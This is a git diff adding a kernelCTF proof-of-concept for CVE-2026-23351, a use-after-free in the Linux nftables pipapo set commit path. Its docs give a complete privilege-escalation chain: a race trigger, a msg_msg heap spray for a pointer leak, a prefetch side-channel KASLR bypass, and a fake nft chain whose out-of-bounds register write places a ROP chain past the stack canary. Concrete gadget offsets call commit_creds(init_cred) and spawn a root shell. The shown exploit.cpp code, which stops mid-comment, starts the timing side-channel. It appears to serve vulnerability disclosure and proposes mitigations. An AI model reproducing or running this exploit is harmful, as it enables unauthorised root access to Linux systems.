diff --git a/pocs/linux/kernelctf/CVE-2026-23351_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2026-23351_cos/docs/exploit.md new file mode 100644 index 000000000..f060d49f8 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23351_cos/docs/exploit.md @@ -0,0 +1,201 @@ +# Exploit + +The pipapo GC UAF is triggered twice. First on a data map to leak a heap pointer via `msg_msg` reclaim, then on a verdict map to hijack `nft_do_chain` into a fake chain. The fake chain abuses `nft_immediate_eval` with an out-of-bounds `dreg` to write a ROP chain over saved registers on the kernel stack, skipping the canary. `commit_creds(init_cred)` + `swapgs; iretq` back to userspace as root. + +~25% per boot (depends on `page_offset_base` alignment), reliable within 4-8 reboots. + +- Vulnerable object: `struct nft_pipapo_elem` (`kmalloc-cg-512`) +- Attacking objects: `struct msg_msg` (heap leak + fake chain), skb data (verdict control) +- Primitive: UAF read for heap infoleak, UAF verdict redirect for code execution + +# Setup + +## Environment + +`unshare(CLONE_NEWUSER | CLONE_NEWNET)` creates a user namespace with `CAP_NET_ADMIN`, required for nftables operations (`nftnl_batch_begin`, `nfnl_send`). The loopback interface is brought up inside the network namespace for IPv6 UDP packet delivery (`::1`). + +## Threading and CPU pinning + +Four threads, pinned to two CPUs: + +- **CPU 0**: main thread (nftables setup + spray), commit thread (triggers `nft_trans_gc_catchall_sync` by toggling dormant flag), spray thread (`msg_msg` / skb allocation) +- **CPU 1**: flood thread (sends IPv6 UDP packets to `::1` triggering `nft_pipapo_lookup` under `rcu_read_lock`), GP-forcer thread (cycles `rcu_read_lock`/`rcu_read_unlock` to advance RCU grace periods) + +Two CPUs are needed because the commit thread on CPU 0 must be inside `vmalloc`'s `cond_resched()` while the flood thread on CPU 1 cycles through RCU read-side critical sections. 
When all CPUs have reported quiescent states, the RCU grace period completes and `call_rcu` callbacks fire, freeing the element while lookups still reference it. + +## Nftables configuration + +Two pipapo sets in table "t", chain "c" (INET family, `NF_INET_LOCAL_OUT` hook), both with concatenated 2×16-byte IPv6 keys (src+dst): + +- Set "s": data map (`NFT_SET_MAP`). The rule copies the lookup result into `meta mark`, which the flood thread reads back from the received packet via `getsockopt`. Used for the heap leak in Phase 1. +- Set "v": verdict map (`NFT_SET_MAP | NFT_SET_VMAP`). The lookup result is a verdict: `NFT_GOTO` redirects `nft_do_chain` to whatever chain the reclaimed element specifies. Used for code execution in Phase 4. + +66,000 filler elements per set force `pipapo_clone` to exceed `KMALLOC_MAX_SIZE` (4 MB on `x86_64` with `MAX_ORDER=10`): + +- 2 fields × 128 bits with `bb=4` grouping → 32 groups of 16 buckets per field +- `lt_size` per field = 4096 × ceil(66000/64) ≈ 4.03 MB (where 4096 = 32 groups × 16 buckets × 8 bytes/long) +- `kvzalloc(4.03 MB)` exceeds the 4 MB `KMALLOC_MAX_SIZE` limit, falling back to `vmalloc` +- `vmalloc` → `__vmalloc_area_node` → `cond_resched()`, reporting an RCU quiescent state for the current CPU + +# Triggering the vulnerability + +The bug is in `nft_pipapo_commit()` (`net/netfilter/nft_set_pipapo.c`): + +```c +static void nft_pipapo_commit(struct nft_set *set) +{ + struct nft_pipapo *priv = nft_set_priv(set); + struct nft_pipapo_match *new_match, *old; + + pipapo_gc(set, priv->clone); // [1] + new_match = pipapo_clone(priv->clone); // [2] + rcu_assign_pointer(priv->match, new_match); // [3] +} +``` + +At [1], `pipapo_gc` walks the clone's element lists, calls `nft_pipapo_gc_deactivate` on each expired element to mark it dead, then queues the batch via `nft_trans_gc_queue_sync` for deferred freeing through `kfree_rcu`. At [2], `pipapo_clone` allocates new lookup tables. 
When the total size exceeds `KMALLOC_MAX_SIZE`, `kvzalloc` falls through to `vmalloc`, which calls `cond_resched()` inside `__vmalloc_area_node`. This reports a quiescent state for the current CPU. If all CPUs have gone through a quiescent state (the flood thread on CPU 1 cycles `rcu_read_lock`/`rcu_read_unlock` continuously), the RCU grace period completes and the `kfree_rcu` callbacks from [1] fire, freeing the elements. + +But `rcu_assign_pointer` at [3] hasn't executed yet. Other CPUs still do packet lookups on the OLD match under `rcu_read_lock`, traversing `pipapo_lookup` which indexes into the now-freed element memory. + +The target element has a 2-second timeout. After it expires, the commit thread toggles the chain's dormant flag to trigger `nft_pipapo_commit`. The vmalloc allocation takes ~10-30ms, enough for the RCU GP to complete. + +# Phase 1: Heap leak + +A target element is added to set "s" with a 2-second timeout and 200 bytes of `NFT_SET_EXT_USERDATA`, putting it in `kmalloc-cg-512` (305 bytes total: base `nft_pipapo_elem` + `NFT_SET_EXT_TIMEOUT` + `NFT_SET_EXT_EXPIRATION` + `NFT_SET_EXT_DATA` + userdata padding). + +After expiry, the commit triggers the UAF. + +## Heap spray and reclaim + +`msg_msg` objects are sprayed to reclaim the freed element's slot: +- `msgsnd()` with 464-byte body → `msg_msg` header (48 bytes) + body = 512 bytes → `kmalloc-cg-512` +- 256 message queues × 4 messages each = 1024 spray objects + +When a `msg_msg` lands on the freed element, the pipapo lookup reads the element's extension data at `ext->offset[NFT_SET_EXT_DATA]`. This offset field now overlaps with byte 3 of `msg_msg.m_list.next` (a kernel heap pointer). If `page_offset_base` alignment gives N=0 (probability ~25%), that byte is < 0x10, and `offset[DATA]` points into the `msg_msg` header region, and the lookup reads 8 bytes of `m_list.next` as the "data map result." + +The flood thread on CPU 1 sends IPv6 UDP packets to `::1`. 
Each packet traverses the `LOCAL_OUT` chain, triggering a pipapo lookup on set "s". The lookup result is copied into the packet's `meta mark`/payload fields by the nft rule, and the flood thread reads it back from the received packet. + +## LIFO drain+refill for stable placement + +After the leak, the `msg_msg` at the leaked address `A` must be replaced with a fake chain. The exploit processes queues one at a time: drain all 4 messages from queue `i` with `msgrcv()`, then immediately refill queue `i` with 4 new messages containing the fake chain payload before moving to queue `i+1`. + +This per-queue interleaving is critical. SLUB's per-cpu freelist is LIFO: freeing 4 objects and immediately reallocating 4 pushes/pops the same slots in reverse order. Batch-draining all 256 queues before any refill would scatter freed slots across the freelist, with intervening kernel allocations stealing them. The interleaved approach keeps the working set small (4 objects) and maximises the probability that the refill lands on the exact same slots, placing the fake chain at the leaked address `A`. + +# Phase 2: KASLR bypass + +EntryBleed / prefetch side-channel (CVE-2022-4543): + +`prefetchnta` on a kernel virtual address behaves differently depending on whether the address is backed by a TLB entry. Mapped `.text` pages show ~131-134 cycle latency; unmapped addresses show ~201+ cycles. The exploit scans 2 MB-aligned addresses across the kernel ASLR range (`0xffffffff81000000` to `0xffffffffc0000000`, the `KASLR_START` and `KASLR_END` constants in `exploit.cpp`) and measures `rdtscp`-bracketed `prefetchnta` latency, taking the minimum across 64 rounds per address to filter noise. + +The scan looks for the first pair of consecutive 2 MB-aligned addresses where both show "mapped" latency. This identifies `_stext` (kernel `.text` is >2 MB). A single scan occasionally produces false positives from speculative TLB fills, so the exploit runs 7 independent scans and applies a Boyer-Moore majority vote to select the consensus `_stext`. 
+ +Returns `_stext`. All ROP gadgets and kernel symbols are computed as fixed offsets from `_stext`. + +# Phase 3: Place fake chain + +With heap leak address `A` from Phase 1, the fake chain is placed at `A+48` (inside `msg_msg.mtext`). The +48 offset skips the `msg_msg` header (48 bytes: `m_list` 16 + `m_type` 8 + `m_ts` 8 + `next` 8 + `security` 8), landing at the start of the user-controlled message body. All pointers within the fake chain reference `A+48+N` offsets, making the entire structure self-contained within a single `msg_msg` object. + +Layout of the fake chain at `A+48`: + +``` +Offset Content Purpose +------ ------- ------- +[0-7] blob_gen_0 = A+48+16 nft_chain.blob_gen_0 → rule blob +[8-15] blob_gen_1 = A+48+16 nft_chain.blob_gen_1 → rule blob +[16-23] nft_rule_blob: { size=256, pad=0 } rule blob header +[24-31] rule_dp: { is_last=0, dlen=64 } 2 expressions × 32 bytes each +[32-39] expr 1 ops = A+48+300 → nft_immediate_eval +[40-55] expr 1 priv.data = {0xFFFFFFFF, 0, 0, 0} NFT_CONTINUE at data[0] +[56-63] expr 1 priv: dreg=0, dlen=4, padding +[64-71] expr 2 ops = A+48+300 → nft_immediate_eval +[72-87] expr 2 priv.data = {0, 0} 136-byte copy source starts here (rbx=0, rbp=0) +[88-95] expr 2 priv: dreg=54, dlen=136, padding dreg/dlen land in saved r12 (harmless) +[96-207] expr 2 copy payload (bytes 24-135) saved r13-r15, return addr, iret frame +[208-299] (padding) +[300-319] fake nft_expr_ops: eval=nft_immediate_eval embedded ops struct +``` + +The fake `nft_expr_ops` at `mtext[300]` sets `eval` to `nft_immediate_eval` (`_stext + 0x12323d0`), `size = 32`, everything else zeroed. This avoids needing the address of the real `nft_imm_ops` in kernel `.data`, so the fake ops struct is self-contained in the `msg_msg` payload. + +Both expressions point to this same fake ops struct. Expression 1 writes `NFT_CONTINUE` (0xFFFFFFFF) to `regs->data[0]` (the verdict register), clearing the stale `NFT_GOTO` so the eval loop proceeds to expression 2. 
Expression 2 calls `nft_immediate_eval` with `dreg=54` and `dlen=136`, which is the novel OOB write technique (see `novel-techniques.md`). + +# Phase 4: Verdict map UAF + code execution + +A target element is added to verdict map set "v" (2-second timeout, `kmalloc-cg-512`). After expiry, a commit triggers the UAF on the verdict map. + +## Verdict reclaim via `AF_UNIX` skb + +`msg_msg` is not used for Phase 4 because the verdict map lookup reads different extension offsets than the data map, and the `msg_msg` header layout doesn't align well with the required `NFT_SET_EXT_DATA` offset for a verdict. Instead, `AF_UNIX` `SOCK_DGRAM` provides fine-grained control over the reclaimed object's contents. + +`socketpair(AF_UNIX, SOCK_DGRAM)` + `write(sv[0], payload, 192)` creates an skb with `skb->head` allocated from `kmalloc-cg-512` (192 bytes data + 320 bytes `skb_shared_info` = 512 bytes). The full 192-byte payload is attacker-controlled, starting at `skb->data`. + +The payload is crafted so the reclaimed element appears valid to `pipapo_lookup`: + +- `ext->genmask = 0` (passes generation check in `nft_pipapo_lookup`) +- `ext->offset[NFT_SET_EXT_DATA] = 16` (points into controlled region within the skb data) +- `ext->offset[NFT_SET_EXT_EXPIRATION] = 160` (points far enough into the buffer that the expiration timestamp reads as a large future value, passing the timeout check) +- At payload offset 16: `verdict.code = NFT_GOTO`, `verdict.chain = A + 48` (the fake chain address from Phase 1) + +When the flood thread's packet triggers a lookup on set "v", the verdict resolves to `NFT_GOTO` with the fake chain pointer. `nft_do_chain` follows the GOTO into the fake chain at `A+48`, entering the expression eval loop with attacker-controlled expressions. 
+ +## Stack layout proof + +`nft_do_chain` prologue on COS-121 (6.6.122, objdump of vmlinux): + +``` +nft_do_chain: + push %r15 + push %r14 + push %r13 + push %r12 + push %rbp + push %rbx + sub $0xf8, %rsp // [1] frame size = 0xf8 + ... + lea 0x20(%rsp), %r12 // [2] regs = rsp + 0x20 +``` + +From [1] and [2]: `regs` is at `rsp+0x20`. The stack canary is at `rsp+0xf0` (stored from `%gs:0x28` after the `sub`). Saved `rbx` starts at `rsp+0xf8`. + +`dreg=54` → byte offset `54 × 4 = 0xd8` from `regs` → absolute position `rsp + 0x20 + 0xd8 = rsp + 0xf8`, exactly the first saved callee register, 8 bytes PAST the canary. + +## ROP chain + +| Stack position | Value | Symbol / Gadget | +|---------------|-------|-----------------| +| `rsp+0xf8` | 0 | saved rbx | +| `rsp+0x100` | 0 | saved rbp | +| `rsp+0x108` | (dreg/dlen) | saved r12 (harmless) | +| `rsp+0x110` | 1 | saved r13 | +| `rsp+0x118` | 0 | saved r14 | +| `rsp+0x120` | 0 | saved r15 | +| `rsp+0x128` | `_stext+0x160db4` | `pop rdi; ret` (`native_write_cr4+0x34`) | +| `rsp+0x130` | `_stext+0x2e72f20` | `&init_cred` | +| `rsp+0x138` | `_stext+0x1ffbe0` | `commit_creds` | +| `rsp+0x140` | `_stext+0x1601949` | `swapgs_restore_regs_and_return_to_usermode+0x99` (pop rax; pop rdi; swapgs; KPTI CR3 restore; iretq) | +| `rsp+0x148` | 0 | rax pad | +| `rsp+0x150` | 0 | rdi pad | +| `rsp+0x158` | `user_rip` | shell function address | +| `rsp+0x160` | 0x33 | user CS | +| `rsp+0x168` | `user_rflags` | saved RFLAGS | +| `rsp+0x170` | `user_rsp` | user stack pointer | +| `rsp+0x178` | 0x2b | user SS | + +`nft_do_chain` returns through its epilogue (`pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret`), pops the overwritten values, and `ret` lands on `pop rdi; ret`. The chain runs `commit_creds(init_cred)`, then `swapgs_restore_regs_and_return_to_usermode+0x99` performs `swapgs`, traverses the KPTI return trampoline, and `iretq` returns to userspace with the iret frame at `rsp+0x148`. `execl("/bin/sh")` gives a root shell. 
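The offset arithmetic in the stack layout and ROP chain sections can be checked mechanically. The following is a minimal sketch, assuming only the COS-121 offsets quoted in this document; the constant and function names (`REGS_OFF`, `reg_index`, `copy_len`) are illustrative and do not appear in `exploit.cpp`.

```cpp
#include <cassert>
#include <cstdint>

// All offsets are the COS-121 values quoted in this document. They are
// inputs to the arithmetic, not something this sketch discovers.
constexpr uint32_t REGS_OFF   = 0x20;   // regs = rsp + 0x20
constexpr uint32_t CANARY_OFF = 0xf0;   // stack canary slot
constexpr uint32_t SAVED_OFF  = 0xf8;   // saved rbx, first callee-saved slot
constexpr uint32_t LAST_SLOT  = 0x178;  // user SS, last 8-byte slot written

// Index into the u32 register array that corresponds to a stack offset.
constexpr uint32_t reg_index(uint32_t stack_off) {
    return (stack_off - REGS_OFF) / 4u;
}

// Bytes needed to cover every slot from saved rbx through user SS.
constexpr uint32_t copy_len() {
    return LAST_SLOT + 8u - SAVED_OFF;
}

static_assert(reg_index(SAVED_OFF) == 54, "dreg that lands on saved rbx");
static_assert(copy_len() == 136, "dlen that covers the whole ROP table");
static_assert(reg_index(CANARY_OFF) == 52, "canary occupies indices 52-53");
static_assert(reg_index(SAVED_OFF) <= 0xff && copy_len() <= 0xff,
              "both values fit the u8 dreg/dlen fields");
```

The last assertion matters because `dreg` and `dlen` are single-byte fields: a kernel whose frame placed the saved registers more than `0xff` words past `regs` could not be reached this way.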
+ +# Stability + +| Component | Success rate | Notes | +|-----------|-------------|-------| +| `page_offset_base` alignment | ~25% per boot | N=0 mod 4 required (see below) | +| Prefetch KASLR | ~95% per trial | 7-trial Boyer-Moore majority vote | +| Heap reclaim (`msg_msg`) | >90% | Interleaved per-queue LIFO drain+refill | +| Verdict reclaim (skb) | >95% | `AF_UNIX` skb same cache, allocated on-demand | +| End-to-end per boot | ~20% | Dominated by alignment requirement | + +The `page_offset_base` constraint: the heap leak reads byte 3 of `msg_msg.m_list.next` as `ext->offset[NFT_SET_EXT_DATA]`. The physical-to-virtual mapping randomises the upper bits of heap pointers. When `page_offset_base & 0xFF00000000 == 0`, byte 3 is < 0x10, producing a valid `offset[DATA]` pointing into the `msg_msg` header where the full 8-byte pointer is readable. Other alignments produce `offset[DATA]` > 0x10, pointing outside the object. The exploit detects this (no valid leak after 100 packets) and exits with code 2, signalling the wrapper script to reboot and retry. + +With a 20% per-boot success rate, 8 independent boots give `1 - 0.8^8 ≈ 83%` cumulative probability. In practice, root is achieved within 4-8 reboots. The exploit exits with distinct codes: +- 0 = root shell obtained +- 1 = unrecoverable error (spray failure, KASLR mismatch) +- 2 = alignment check failed (retry on next boot) diff --git a/pocs/linux/kernelctf/CVE-2026-23351_cos/docs/novel-techniques.md b/pocs/linux/kernelctf/CVE-2026-23351_cos/docs/novel-techniques.md new file mode 100644 index 000000000..b4860d19a --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23351_cos/docs/novel-techniques.md @@ -0,0 +1,72 @@ +# `nft_immediate_eval` OOB dreg write + +## Problem + +After gaining a UAF on an nft set element and redirecting `nft_do_chain` to a fake chain on the heap, the standard next step is a stack pivot to a controlled ROP chain. 
On COS-121 (6.6.122), this fails: + +- `.text` has no usable `xchg rsp, rXX`, `mov rsp, [rXX]`, or `push rXX; pop rsp` gadgets (checked via raw byte search for `48 94`, `48 87 xx`, `5c`, and `53 5c` across the full 19MB .text; occurrences exist but all are mid-instruction or followed by immediate faults) +- At the `expr->ops->eval` call site, RDI points to the fake expression (heap) but no other general-purpose register holds a controlled heap address; `push rdi; pop rsp` (`57 5c`) has no usable occurrence either +- `.rodata` is on a separate 2MB page, mapped NX, so no jump to data there + +Without a stack pivot, the attacker has code execution via `nft_do_chain`'s expression eval loop but no way to run a ROP chain. + +## Technique + +`nft_immediate_eval` performs an unchecked `memcpy` from expression data into `regs->data[dreg]`: + +```c +static void nft_immediate_eval(const struct nft_expr *expr, + struct nft_regs *regs, ...) +{ + const struct nft_immediate_expr *priv = nft_expr_priv(expr); + nft_data_copy(&regs->data[priv->dreg], &priv->data, priv->dlen); // [1] +} +``` + +At [1], `dreg` (u8) is a u32 array index and `dlen` (u8) is the byte count. Neither is bounds-checked at eval time. Validation happens at rule install time in `nft_parse_register_store`, but this is bypassed because the expressions come from a fake chain on the heap, not from netlink. + +In `nft_do_chain`, `regs` is a local variable on the stack at `rsp+0x20`. The stack canary is at `rsp+0xf0`, saved callee registers start at `rsp+0xf8`. A fake expression with `dreg=54` writes starting at byte offset `54 × 4 = 0xd8` from `regs`, landing at `rsp+0xf8`, 8 bytes past the canary. With `dlen=136`, this covers saved `rbx` through `r15`, the return address, and a full ROP payload + iret frame. + +The fake chain needs two expressions: +1. Reset the verdict register (`regs->data[0]`) to `NFT_CONTINUE`, since the eval loop would otherwise re-enter GOTO handling from the stale verdict +2. 
OOB write with `dreg=54`, `dlen=136` containing the ROP chain + +When `nft_do_chain` returns through its epilogue (`pop rbx; pop rbp; pop r12-r15; ret`), the overwritten return address starts the ROP chain. The canary check passes because `dreg=54` starts past it. + +## Prior art + +No prior kernelCTF submission uses this technique. Prior nft-based exploits either: +- Corrupt a function pointer in an nft object (e.g. `nft_expr_ops.eval`) and pivot to a heap ROP chain (requires a stack pivot gadget) +- Use page-level attacks (DirtyPagetable, `pipe_buffer` page UAF), which require different bug primitives +- Use `modprobe_path` / `core_pattern` overwrites, blocked by read-only mounts on COS + +The OOB dreg write is distinct: the `expr->ops->eval` indirect call targets the real `nft_immediate_eval` function, whose own `memcpy` writes the ROP chain directly onto the kernel stack. No branch to arbitrary code, no stack pivot needed. + +## Why the canary doesn't help + +Stack canaries protect against linear buffer overflows that start below the canary and overwrite upwards. The OOB dreg write starts at `dreg=54` which corresponds to `rsp+0xf8`, 8 bytes ABOVE the canary at `rsp+0xf0`. The canary bytes (indices 52-53) are never touched. The epilogue's `__stack_chk_fail` check passes because the canary is intact. + +Canaries only detect contiguous overwrites from below. A write with an attacker-controlled starting offset bypasses them. + +## Generalisability + +The technique applies wherever: +1. An eval/dispatch loop stores a register file on the stack +2. Expression/instruction data comes from attacker-controlled memory +3. The register index and write length are validated at load time but not at eval time + +The `dreg` value is target-specific. To compute it for a given kernel: +``` +dreg = (saved_regs_offset - regs_offset) / sizeof(u32) + = (canary_offset + 8 - regs_offset) / 4 +``` +On COS-121: `(0xf8 - 0x20) / 4 = 54`. 
On other kernels, check `nft_do_chain`'s `sub $N, %rsp` and `lea M(%rsp), %rREGS` in the prologue. + +Beyond nftables, the same pattern could apply to any kernel interpreter that stores a scratch register file on the stack and dispatches attacker-influenced instructions, e.g. a custom VM in a kernel module or any expression evaluator where operand indices are validated at load time but not at eval time. + +## Proposed mitigations + +1. **Bounds-check dreg at eval time**: `if (priv->dreg + priv->dlen/4 > NFT_REG32_COUNT) return;` in `nft_immediate_eval`. Low overhead (~2 instructions). +2. **Move regs off the stack**: allocate `nft_regs` on the heap or in a per-CPU area, so OOB writes can't reach saved registers. +3. **Compiler-based stack layout randomisation**: randomise the relative position of local variables and saved registers, making `dreg` calculation target-specific and unpredictable. +4. **Validate fake chain pointers**: `nft_do_chain` could verify that `chain->blob_gen_X` points into a valid nft allocation, not arbitrary heap memory. 
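The first proposed mitigation can be modelled in userspace to see which stores it would reject. This is a hedged sketch, not kernel code: it assumes the register file holds 20 `u32` slots (4 for the verdict plus 16 data words), and the name `MODEL_REG32_SLOTS` is hypothetical. It also rounds the byte length up to whole words, so that a store ending in a partial word is counted.

```cpp
#include <cassert>
#include <cstdint>

// Assumption for this model only: 20 u32 slots in the register file.
// The constant name is hypothetical and not taken from the kernel.
constexpr uint32_t MODEL_REG32_SLOTS = 20;

// True when a store of `dlen` bytes starting at u32 index `dreg` stays
// inside the register file. The length is rounded up to whole words.
constexpr bool store_in_bounds(uint8_t dreg, uint8_t dlen) {
    return uint32_t(dreg) + (uint32_t(dlen) + 3u) / 4u <= MODEL_REG32_SLOTS;
}

static_assert(store_in_bounds(0, 4), "verdict reset (expression 1) is in bounds");
static_assert(!store_in_bounds(54, 136), "OOB write (expression 2) is rejected");
static_assert(!store_in_bounds(19, 5), "rounding up catches a partial last word");
```

Under these assumptions only the second fake expression is rejected. The third assertion shows why rounding matters: with a truncating `dlen / 4`, a 5-byte store at index 19 would be counted as one word and accepted.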
diff --git a/pocs/linux/kernelctf/CVE-2026-23351_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2026-23351_cos/docs/vulnerability.md new file mode 100644 index 000000000..0e31f14ed --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23351_cos/docs/vulnerability.md @@ -0,0 +1,42 @@ +# Vulnerability details + +- **Requirements**: + - **Capabilities**: `CAP_NET_ADMIN` + - **Kernel configuration**: `CONFIG_NF_TABLES` + - **User namespaces required**: Yes +- **Introduced by**: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3c4287f6204483683a16e8b1fb9f4164fb70e2e4 +- **Fixed by**: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9df95785d3d8302f7c066050117b04cd3c2048c2 +- **Affected Version**: `5.6 - 6.14` +- **Affected Component**: `net/netfilter: nft_set_pipapo` +- **Syscall to disable**: `unshare` +- **Cause**: Use-After-Free +- **Description**: Use-after-free in `nft_pipapo_commit()`. `pipapo_gc()` marks expired elements dead and queues them for deferred freeing via `kfree_rcu`, while `pipapo_clone()` allocates new lookup tables. When the table exceeds `KMALLOC_MAX_SIZE`, `kvzalloc` falls back to `vmalloc` which calls `cond_resched()`, completing the RCU grace period and firing the kfree callbacks. But `rcu_assign_pointer()` hasn't executed yet, so packet lookups on other CPUs still dereference freed elements through the old match. 
+ +# Vulnerability analysis + +The bug is in `net/netfilter/nft_set_pipapo.c`, function `nft_pipapo_commit()`: + +```c +static void nft_pipapo_commit(struct nft_set *set) +{ + struct nft_pipapo *priv = nft_set_priv(set); + struct nft_pipapo_match *new_match, *old; + + pipapo_gc(set, priv->clone); // [1] marks expired elements dead, queues for kfree_rcu + + new_match = pipapo_clone(priv->clone); // [2] kvzalloc -> vmalloc -> cond_resched() + + rcu_assign_pointer(priv->match, new_match); // [3] publish new match +} +``` + +Between [1] and [3], `vmalloc`'s `cond_resched()` at [2] reports a quiescent state for the current CPU. If all CPUs have gone through a quiescent state, the RCU grace period completes and the `kfree_rcu` callbacks queued by [1] fire, freeing the elements. But `rcu_assign_pointer` at [3] hasn't happened yet, so other CPUs are still doing packet lookups on the old match under `rcu_read_lock()` and end up dereferencing freed memory. + +To force the vmalloc path, ~66,000 elements with 32-byte concatenated keys are needed: +- 2 fields × 128 bits, `bb=4` grouping +- `lt_size` per field = 4096 × ceil(66000/64) ≈ 4.03 MB +- Exceeds `KMALLOC_MAX_SIZE` (4 MB on `x86_64` with `MAX_ORDER=10`) + +The target element has a 2s timeout. After it expires, a commit is triggered so `pipapo_gc` frees it. The vmalloc allocation takes ~10-30ms, enough for the RCU GP to complete if the flood thread on another CPU is cycling through `rcu_read_lock()`/`rcu_read_unlock()`. + +The fix (commit 9df95785d3d8) splits GC into unlink and reclaim phases, deferring element destruction until after `rcu_assign_pointer` installs the new match. 
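The sizing arithmetic used to force the vmalloc path can be verified with a few compile-time checks. This is a sketch of the formula as stated in this document (`4096 × ceil(N/64)` bytes per field against a 4 MB limit); the names `lt_size` and `KMALLOC_MAX_BYTES` are illustrative, and any extra alignment padding the real allocator adds is not modelled.

```cpp
#include <cassert>
#include <cstdint>

// 4 MB limit quoted in the text for x86_64 with MAX_ORDER=10.
constexpr uint64_t KMALLOC_MAX_BYTES = 4ull << 20;

// 32 groups x 16 buckets x 8 bytes per long, as stated in the text.
constexpr uint64_t BYTES_PER_RULE_WORD = 32ull * 16ull * 8ull;

// Lookup-table size per field for `rules` elements, per the document's formula.
constexpr uint64_t lt_size(uint64_t rules) {
    return BYTES_PER_RULE_WORD * ((rules + 63ull) / 64ull);
}

static_assert(BYTES_PER_RULE_WORD == 4096, "matches the 4096 factor in the text");
static_assert(lt_size(66000) == 4227072, "about 4.03 MB for 66,000 elements");
static_assert(lt_size(66000) > KMALLOC_MAX_BYTES, "above the limit");
static_assert(lt_size(65536) == KMALLOC_MAX_BYTES, "exactly at the limit");
static_assert(lt_size(65537) > KMALLOC_MAX_BYTES, "first count above the limit");
```

By this formula the threshold sits at 65,537 elements, so 66,000 fillers leave a small margin above it.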
diff --git a/pocs/linux/kernelctf/CVE-2026-23351_cos/exploit/cos-121-18867.381.30/Makefile b/pocs/linux/kernelctf/CVE-2026-23351_cos/exploit/cos-121-18867.381.30/Makefile new file mode 100644 index 000000000..200d87c07 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23351_cos/exploit/cos-121-18867.381.30/Makefile @@ -0,0 +1,10 @@ +all: exploit + +exploit: exploit.cpp + g++ -std=c++17 -static -O2 -o exploit exploit.cpp -lkernelXDK -lpthread + +exploit_debug: exploit.cpp + g++ -g1 -std=c++17 -static -O2 -o exploit_debug exploit.cpp -lkernelXDK -lpthread + +run: + ./exploit diff --git a/pocs/linux/kernelctf/CVE-2026-23351_cos/exploit/cos-121-18867.381.30/exploit b/pocs/linux/kernelctf/CVE-2026-23351_cos/exploit/cos-121-18867.381.30/exploit new file mode 100755 index 000000000..3d4734df2 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23351_cos/exploit/cos-121-18867.381.30/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2026-23351_cos/exploit/cos-121-18867.381.30/exploit.cpp b/pocs/linux/kernelctf/CVE-2026-23351_cos/exploit/cos-121-18867.381.30/exploit.cpp new file mode 100644 index 000000000..387735e0a --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23351_cos/exploit/cos-121-18867.381.30/exploit.cpp @@ -0,0 +1,2118 @@ +/* + * pipapo GC UAF PoC — deterministic vmalloc approach + * + * On COS-121: MAX_ORDER=10 → KMALLOC_MAX_SIZE=4MB. 
+ * With two 16-byte fields (IPv6 src+dst) and 66K elements: + * - bb switches from 8→4 at ~4K rules + * - At bb=4: groups=32, lt_size = 4096 * ceil(N/64) per field + * - For N=66000: lt_size ≈ 4.03MB > 4MB = KMALLOC_MAX_SIZE + * - kvzalloc in pipapo_clone → kmalloc FAILS → vmalloc + * - vmalloc has cond_resched → RCU quiescent state reported + * - RCU grace period completes → call_rcu callbacks fire → elements kfree'd + * - But rcu_assign_pointer (match swap) hasn't happened yet + * - Packet lookups still use OLD live match → access freed element memory → UAF + * + * No memory fragmentation needed — this is deterministic. + * + * Target element layout (kmalloc-cg-512, 305 bytes with USERDATA): + * [0-15] nft_set_ext header (genmask + offset[9] + padding) + * [16-47] KEY (32B: src_ipv6 ++ dst_ipv6) + * [48-79] KEY_END (32B) + * [80-87] DATA (8B) + * [88-95] TIMEOUT (8B) + * [96-103] EXPIRATION (8B) + * [104-304] USERDATA (1B len + 200B data) → pushes to kmalloc-cg-512 + * + * Filler element layout (kmalloc-cg-128, 104 bytes): + * Same as above minus USERDATA + * + * After kfree: SLUB freelist pointer at s->offset corrupts some field. + * If s->offset=0: ext header corrupted → offset table wrong → + * nft_set_elem_expired reads from wrong location → returns false → + * lookup proceeds → data read from wrong offset → changed value = UAF. + */ + +#include +#include + +INCBIN(target_db, "target_db.kxdb"); +__asm__(".text\n"); + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +/* ====== KASLR bypass via prefetch side-channel (Intel) ====== + * Based on "Prefetch Side-Channel Attacks" by Daniel Gruss et al. + * Used by ~60% of kernelCTF submissions. Works through KPTI. 
+ * prefetchnta on mapped kernel pages shows different timing than unmapped. */ + +inline __attribute__((always_inline)) uint64_t rdtsc_begin(void) { + uint64_t a, d; + asm volatile("mfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "lfence\n\t" + : "=r" (d), "=r" (a) : : "%rax", "%rbx", "%rcx", "%rdx"); + return (d << 32) | a; +} + +inline __attribute__((always_inline)) uint64_t rdtsc_end(void) { + uint64_t a, d; + asm volatile("xor %%rax, %%rax\n\t" + "lfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r" (d), "=r" (a) : : "%rax", "%rbx", "%rcx", "%rdx"); + return (d << 32) | a; +} + +static size_t flushandreload(void *addr) { + size_t time = rdtsc_begin(); + asm volatile("prefetchnta (%0)\nprefetcht2 (%0)\n" : : "r" (addr)); + return rdtsc_end() - time; +} + +/* Prefetch side-channel KASLR bypass. + * Kernel text pages show distinctly LOWER prefetch latency (~131-134 cycles) + * vs unmapped pages (~201-209 cycles) in this KVM environment. + * Algorithm: measure all 2MB-aligned addresses, find the first address with + * timing significantly below the unmapped baseline → that's _stext. 
